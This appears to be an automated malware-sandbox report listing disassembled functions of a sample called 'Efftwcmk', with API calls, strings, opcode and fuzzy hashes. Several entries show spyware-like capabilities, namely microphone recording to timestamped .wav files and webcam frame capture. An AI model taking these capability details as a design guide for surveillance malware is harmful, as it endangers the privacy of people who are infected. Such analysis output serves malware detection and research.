                                                      • Instruction ID: 9ff1b5a73bce494ac3bf992bd42ed3b2223e9b6d85fb4f2fea72a850da47e955
                                                      • Opcode Fuzzy Hash: 8d15d863bd25b1e0ccffd60af125c03f9a1de04462ea42adde6717aff8e186a4
                                                      • Instruction Fuzzy Hash: 8E71C270E042A88FDB21AA2CCC84BD9BBF5FB49704F1441E5D949DB281DB758AC5CF92
                                                      APIs
                                                      • GetConsoleCP.KERNEL32 ref: 2D26B3FE
                                                      • __fassign.LIBCMT ref: 2D26B479
                                                      • __fassign.LIBCMT ref: 2D26B494
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 2D26B4BA
                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,2D26BB31,00000000), ref: 2D26B4D9
                                                      • WriteFile.KERNEL32(?,?,00000001,2D26BB31,00000000), ref: 2D26B512
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 1324828854-771429351
                                                      • Opcode ID: e6a71e5230b4bd6f4ed46c434bdff7f0a65d54b28b57dea92a444696984f2de7
                                                      • Instruction ID: 8339560bece6328f18ce31f4c96bb24d482c1e3834538c670d5652a01b0ed69c
                                                      • Opcode Fuzzy Hash: e6a71e5230b4bd6f4ed46c434bdff7f0a65d54b28b57dea92a444696984f2de7
                                                      • Instruction Fuzzy Hash: F55160719403499FDB10CFA8CC95AEEBBF8EF19710F14415AEA55F7281E7309A81CBA0
                                                      APIs
                                                      • _strftime.LIBCMT ref: 2D221D50
                                                        • Part of subcall function 2D221A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 2D221AD9
                                                      • waveInUnprepareHeader.WINMM(2D292A88,00000020,00000000), ref: 2D221E02
                                                      • waveInPrepareHeader.WINMM(2D292A88,00000020), ref: 2D221E40
                                                      • waveInAddBuffer.WINMM(2D292A88,00000020), ref: 2D221E4F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                      • String ID: %Y-%m-%d %H.%M$.wav$dM)-$|M)-
                                                      • API String ID: 3809562944-3745576182
                                                      • Opcode ID: 25175db72d5a4a4e52e302c8bc0c6ee155b6ac69ce8ad7316d27460e51587dd4
                                                      • Instruction ID: 3aeb83c82cc0ec293123f97c958de298b0e22e0f2180b919c6b460ff705f2cde
                                                      • Opcode Fuzzy Hash: 25175db72d5a4a4e52e302c8bc0c6ee155b6ac69ce8ad7316d27460e51587dd4
                                                      • Instruction Fuzzy Hash: 75315231548711AFC325DB20CC98EDB77B9EF64614F518439B259A22A0EF346909CB96
                                                      APIs
                                                        • Part of subcall function 2D23179C: SetLastError.KERNEL32(0000000D,2D231D1C,00000000,t^(-,?,?,?,?,?,?,?,?,?,?,?,2D231CFA), ref: 2D2317A2
                                                      • SetLastError.KERNEL32(000000C1,00000000,t^(-,?,?,?,?,?,?,?,?,?,?,?,2D231CFA), ref: 2D231D37
                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 2D231DA5
                                                      • SetLastError.KERNEL32(0000000E), ref: 2D231DC9
                                                        • Part of subcall function 2D231CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,2D231DE7,?,00000000,00003000,00000040,00000000), ref: 2D231CB3
                                                      • GetProcessHeap.KERNEL32(00000008,00000040), ref: 2D231E10
                                                      • HeapAlloc.KERNEL32(00000000), ref: 2D231E17
                                                      • SetLastError.KERNEL32(0000045A), ref: 2D231F2A
                                                        • Part of subcall function 2D232077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,2D231F37), ref: 2D2320E7
                                                        • Part of subcall function 2D232077: HeapFree.KERNEL32(00000000), ref: 2D2320EE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                      • String ID: t^(-
                                                      • API String ID: 3950776272-3149470130
                                                      • Opcode ID: db163f43622671265bc614af37b23a5114702b79d3df28ccdbddf4d637a9542e
                                                      • Instruction ID: 2f1dcf7a7e6768d2c642557105de5613b1c498e16d37b6b5b61e8b83e5638dfe
                                                      • Opcode Fuzzy Hash: db163f43622671265bc614af37b23a5114702b79d3df28ccdbddf4d637a9542e
                                                      • Instruction Fuzzy Hash: F46117F06943269BD7839F25CD80B7A7BA5FF49740F004529EE04AB281EB75E441CBE1
                                                      APIs
                                                      • GetThreadLocale.KERNEL32(00000000,02C7C003,?,?,00000000,00000000), ref: 02C7BD6E
                                                        • Part of subcall function 02C7A73C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C7A75A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locale$InfoThread
                                                      • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                      • API String ID: 4232894706-2493093252
                                                      • Opcode ID: 5079e5a72f200bc49af25140bc6c5e8d4919ce35aec54b509953a81b33867113
                                                      • Instruction ID: 7b8972bced0806af5072e1726e08ddde8456f9bf8eb2dd451d698b184a1b05c6
                                                      • Opcode Fuzzy Hash: 5079e5a72f200bc49af25140bc6c5e8d4919ce35aec54b509953a81b33867113
                                                      • Instruction Fuzzy Hash: E4618074B001499BDB14EBB8D890B9FB7BB9F88304F519435E101AB345CA35DE0AABE1
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,2D276FFF), ref: 2D275F27
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: acos$asin$log$log10$pow$sqrt
                                                      • API String ID: 3527080286-3190521889
                                                      • Opcode ID: 7b07da8b776e4d41190c27005d8c0aee2777b734d54d758789b94973926d47aa
                                                      • Instruction ID: dfd557eec42b6ffa169eb3f7f15b47dc52f5d6449be0660956d6bc36bced7c2e
                                                      • Opcode Fuzzy Hash: 7b07da8b776e4d41190c27005d8c0aee2777b734d54d758789b94973926d47aa
                                                      • Instruction Fuzzy Hash: E951937098064ACBEF21CF64DE889ECBBB4FF4A341F604295D440B7695CB359914CB2A
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 2D2218BE
                                                      • ExitThread.KERNEL32 ref: 2D2218F6
                                                      • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 2D221A04
                                                        • Part of subcall function 2D254770: __onexit.LIBCMT ref: 2D254776
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                      • String ID: Pk)-$XM)-$N)-$N)-
                                                      • API String ID: 1649129571-1371536499
                                                      • Opcode ID: c436a3bab09b8c936e7ba1203de0e0efd3148bbe39bd7ac7785003ed40a47815
                                                      • Instruction ID: 3b82413c9c9eaf7481b5b4e2525995ce91085d3e3b1da33a912303f393022a17
                                                      • Opcode Fuzzy Hash: c436a3bab09b8c936e7ba1203de0e0efd3148bbe39bd7ac7785003ed40a47815
                                                      • Instruction Fuzzy Hash: 7741BF711886909AC329DB24CCE8EEF73A5EFA0710F514539F255B62E0EF356906C716
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02C743F3,?,?,02CAE7C8,?,?,02C9A7A8,02C7655D,02C9930D), ref: 02C74365
                                                      • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 02C7436B
                                                      • GetStdHandle.KERNEL32(000000F5,02C743B4,00000002,?,00000000,00000000,?,02C743F3,?,?,02CAE7C8,?,?,02C9A7A8,02C7655D,02C9930D), ref: 02C74380
                                                      • WriteFile.KERNEL32(00000000,000000F5,02C743B4,00000002,?), ref: 02C74386
                                                      • MessageBoxA.USER32 ref: 02C743A4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileHandleWrite$Message
                                                      • String ID: Error$Runtime error at 00000000
                                                      • API String ID: 1570097196-2970929446
                                                      • Opcode ID: 3f689f3bd81fa630903dbaaaa1d2fe5041a0d56b4b9a0e3741bfa7aeef279688
                                                      • Instruction ID: 3eb4ac097e3486893b41249be2e45ac299ed5b60672640685f33ece8aa2bc708
                                                      • Opcode Fuzzy Hash: 3f689f3bd81fa630903dbaaaa1d2fe5041a0d56b4b9a0e3741bfa7aeef279688
                                                      • Instruction Fuzzy Hash: 6AF0B471AC43407AFA24A7B0AC4AF69277C5785F18F180B16B23CA90C087E492C4AB25
                                                      APIs
                                                      • _free.LIBCMT ref: 2D269212
                                                      • _free.LIBCMT ref: 2D269236
                                                      • _free.LIBCMT ref: 2D2693BD
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,2D27F234), ref: 2D2693CF
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,2D292764,000000FF,00000000,0000003F,00000000,?,?), ref: 2D269447
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,2D2927B8,000000FF,?,0000003F,00000000,?), ref: 2D269474
                                                      • _free.LIBCMT ref: 2D269589
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 314583886-0
                                                      • Opcode ID: 870e021d4758c7e5d9e6cabeb908a6365f6ecbe3031ab3d99adcddb3ac9bc75a
                                                      • Instruction ID: 36e45f0cf7b504e0fc8a1b1876059b49505caf9fc517b07adf6dc751a7b23464
                                                      • Opcode Fuzzy Hash: 870e021d4758c7e5d9e6cabeb908a6365f6ecbe3031ab3d99adcddb3ac9bc75a
                                                      • Instruction Fuzzy Hash: 5DC12B719843459BDB098F74CC40BEABBB8EF56614F1441AAD654B7281EB319AC1CBF0
                                                      APIs
                                                        • Part of subcall function 2D270C41: _free.LIBCMT ref: 2D270C6A
                                                      • _free.LIBCMT ref: 2D270F48
                                                        • Part of subcall function 2D266782: HeapFree.KERNEL32(00000000,00000000), ref: 2D266798
                                                        • Part of subcall function 2D266782: GetLastError.KERNEL32(?,?,2D270C6F,?,00000000,?,00000000,?,2D270F13,?,00000007,?,?,2D27145E,?,?), ref: 2D2667AA
                                                      • _free.LIBCMT ref: 2D270F53
                                                      • _free.LIBCMT ref: 2D270F5E
                                                      • _free.LIBCMT ref: 2D270FB2
                                                      • _free.LIBCMT ref: 2D270FBD
                                                      • _free.LIBCMT ref: 2D270FC8
                                                      • _free.LIBCMT ref: 2D270FD3
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                      • Instruction ID: 63e0a185bef4cdb045e3f364700028ee43c7acacef415c0140dfbc83fb9b3455
                                                      • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                      • Instruction Fuzzy Hash: EB115E315C8744AAE531AB70CD45FDB7BBCEF10701F614838BBAD76190DAB4B94856A0
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(KernelBase,00000000,02C87C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C87BBE
                                                      • GetProcAddress.KERNEL32(00000000,KernelBase,00000000,02C87C40,00000000,00000000,00000000,00000000,00000000,oces,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C87BC4
                                                      • GetCurrentProcess.KERNELBASE ref: 02C87BCE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressCurrentHandleModuleProcProcess
                                                      • String ID: GetCurre$KernelBase$oces
                                                      • API String ID: 4190356694-953896676
                                                      • Opcode ID: 13dc8097f8545684a5a8b311ef78a8fd615a6d76f7dcf67af147793a0bcc951c
                                                      • Instruction ID: f82068cb4e4e20378f258f73c2f8c3e88197f42cd90ad448b7c1671aa56dae13
                                                      • Opcode Fuzzy Hash: 13dc8097f8545684a5a8b311ef78a8fd615a6d76f7dcf67af147793a0bcc951c
                                                      • Instruction Fuzzy Hash: 66F0A4387847047FF725BBA0DC12F2AB7AEE744F09F718474B601A3A40E6B56914A925
                                                      APIs
                                                        • Part of subcall function 02C7ACB4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C7ACD1
                                                        • Part of subcall function 02C7ACB4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C7ACF5
                                                        • Part of subcall function 02C7ACB4: GetModuleFileNameA.KERNEL32(02C70000,?,00000105), ref: 02C7AD10
                                                        • Part of subcall function 02C7ACB4: LoadStringA.USER32 ref: 02C7ADA6
                                                      • CharToOemA.USER32 ref: 02C7AE73
                                                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02C7AE90
                                                      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 02C7AE96
                                                      • GetStdHandle.KERNEL32(000000F4,02C7AF00,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02C7AEAB
                                                      • WriteFile.KERNEL32(00000000,000000F4,02C7AF00,00000002,?), ref: 02C7AEB1
                                                      • LoadStringA.USER32 ref: 02C7AED3
                                                      • MessageBoxA.USER32 ref: 02C7AEE9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                      • String ID:
                                                      • API String ID: 185507032-0
                                                      • Opcode ID: 25ecee5bc36cdc95992da39662b1c76c9bcaa8638c371870532f4d0985291401
                                                      • Instruction ID: 2a5d82e9e6ca6b6d363130c67982c879e201927b67f7ee13fe4c2a248e0bd5f5
                                                      • Opcode Fuzzy Hash: 25ecee5bc36cdc95992da39662b1c76c9bcaa8638c371870532f4d0985291401
                                                      • Instruction Fuzzy Hash: 361127B2588204BEE300EBA4CC81F9F77EEAF54704F904A2AB754D71E0DA71D9449B62
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,Pk)-N)-,2D2632EB,00000003,Pk)-N)-,2D26328B,00000003,2D28E948,0000000C,2D2633E2,00000003,00000002), ref: 2D26335A
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,Pk)-N)-,2D2632EB,00000003,Pk)-N)-,2D26328B,00000003,2D28E948,0000000C,2D2633E2,00000003,00000002), ref: 2D26336D
                                                      • FreeLibrary.KERNEL32(00000000,?,?,Pk)-N)-,2D2632EB,00000003,Pk)-N)-,2D26328B,00000003,2D28E948,0000000C,2D2633E2,00000003,00000002,00000000,Pk)-N)-), ref: 2D263390
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$Pk)-N)-$mscoree.dll
                                                      • API String ID: 4061214504-3755321912
                                                      • Opcode ID: 875196e56b0172339eb734433a1ca16ad61ef2b6048fadab091c2c7f43fb6486
                                                      • Instruction ID: 39a3784b535822492c835f535eb779887fa74fbe35f7fa9ef449babdbcc286c5
                                                      • Opcode Fuzzy Hash: 875196e56b0172339eb734433a1ca16ad61ef2b6048fadab091c2c7f43fb6486
                                                      • Instruction Fuzzy Hash: B7F0A434A41209FBDB219F60CC4CBAEBFB5EF09B55F0041A8F905B22A0EB345A40CAD4
                                                      APIs
                                                      • __allrem.LIBCMT ref: 2D25AC69
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2D25AC85
                                                      • __allrem.LIBCMT ref: 2D25AC9C
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2D25ACBA
                                                      • __allrem.LIBCMT ref: 2D25ACD1
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2D25ACEF
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                      • Instruction ID: d255612dfce7b39e11ad0b6d7e08e36dbfe9ef15f2a2b53103a506f0079c1007
                                                      • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                      • Instruction Fuzzy Hash: 3E812C726897069BE7189B28CC82F6A73E9EF55720F20453AE610F7280F775F94487A0
                                                      APIs
                                                      • Sleep.KERNEL32(00000000,?), ref: 2D2244C4
                                                        • Part of subcall function 2D224607: __EH_prolog.LIBCMT ref: 2D22460C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prologSleep
                                                      • String ID: CloseCamera$FreeFrame$GetFrame$HN)-$OpenCamera
                                                      • API String ID: 3469354165-3159281448
                                                      • Opcode ID: ddc26ea1b6ce9ac074e420903940f0595ad776bdc9e8deedb1617e0990a3b33d
                                                      • Instruction ID: 016f498f84d733b09d28c7728e3ec1624635b081511e779033eec532b2fc8370
                                                      • Opcode Fuzzy Hash: ddc26ea1b6ce9ac074e420903940f0595ad776bdc9e8deedb1617e0990a3b33d
                                                      • Instruction Fuzzy Hash: 61514631A8CB1167C715EB348C4CA6E37A5EFB0A40F814138F64577791DF35AA06C396
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __freea$_free
                                                      • String ID: a/p$am/pm$z&-
                                                      • API String ID: 3432400110-1842569809
                                                      • Opcode ID: 855aed93f1a8e68c9583a68e5e264d7ff3c126fca124a6f8f5658a6c7883bf4a
                                                      • Instruction ID: ee7a1f16cd3f5856e2d50a577d91b6a5972cba989bcf1c0bc1ab75504ed4564b
                                                      • Opcode Fuzzy Hash: 855aed93f1a8e68c9583a68e5e264d7ff3c126fca124a6f8f5658a6c7883bf4a
                                                      • Instruction Fuzzy Hash: 5ED1CE31999307CADB168F64EC80ABAB7F1FF05740F248159DA44BBA59E27599C0CBF0
                                                      APIs
                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C7E59D
                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C7E5B9
                                                      • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02C7E5F2
                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C7E66F
                                                      • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02C7E688
                                                      • VariantCopy.OLEAUT32(?,00000000), ref: 02C7E6BD
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2c70000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                      • String ID:
                                                      • API String ID: 351091851-0
                                                      • Opcode ID: 64ad64c3195a2b266e732bc1d787a2588087a1c16bed5c34222ee16cb595d48a
                                                      • Instruction ID: 4eb16e0d618de1ae91261030451efc29454c5a5d4d6e00a71ffff65ee7ed8b4e
                                                      • Opcode Fuzzy Hash: 64ad64c3195a2b266e732bc1d787a2588087a1c16bed5c34222ee16cb595d48a
                                                      • Instruction Fuzzy Hash: 2451C5B690062D9BCB62EF58CC80BD9B3BDAF8D310F4441E5E509A7211DB70AF859F61
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 1036877536-771429351
                                                      • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                      • Instruction ID: 777d4fffa91991157ad02a34e610e277d736058685e7cd943e88464a80e6ffb7
                                                      • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                      • Instruction Fuzzy Hash: 25A14871AC83869FE712CF58CC81BAABBE5FF51350F1441A9D695BB281C23999C1C7E0
                                                      APIs
                                                      • GetLastError.KERNEL32(?,2D25F720,2D25A7F5,2D25F720,2D294EF8,Pk)-N)-,2D25CE15,FF8BC35D,2D294EF8,2D294EF8), ref: 2D268219
                                                      • _free.LIBCMT ref: 2D26824C
                                                      • _free.LIBCMT ref: 2D268274
                                                      • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 2D268281
                                                      • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 2D26828D
                                                      • _abort.LIBCMT ref: 2D268293
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: 1ac3623901bb2595894742e469820a2686eca0e2d55b6c445ffb2f79ae32a932
                                                      • Instruction ID: a91b6e1ec267ad193458f29b1d5ad47d497459523c8958023f2299212592eeef
                                                      • Opcode Fuzzy Hash: 1ac3623901bb2595894742e469820a2686eca0e2d55b6c445ffb2f79ae32a932
                                                      • Instruction Fuzzy Hash: F2F04E391C8B812BC20326255C08F6B6535DFD2A65F210234FA24B22C0EF2498C549F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Offset: 2D220000, based on PE: true
                                                      • Associated: 0000000B.00000002.470885800.000000002D294000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000B.00000002.470885800.000000002D298000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_2d220000_Efftwcmk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Pk)-N)-
                                                      • API String ID: 0-771429351
                                                      • Opcode ID: 2d25666de7f9f87afc24e46b330590e30263787cc905a1580beb3cdc45f9e717
                                                      • Instruction ID: 5f9641ba9a334b42966d43450ae604ebb08fe4b1deccec3e9a261de6fd17f1b5
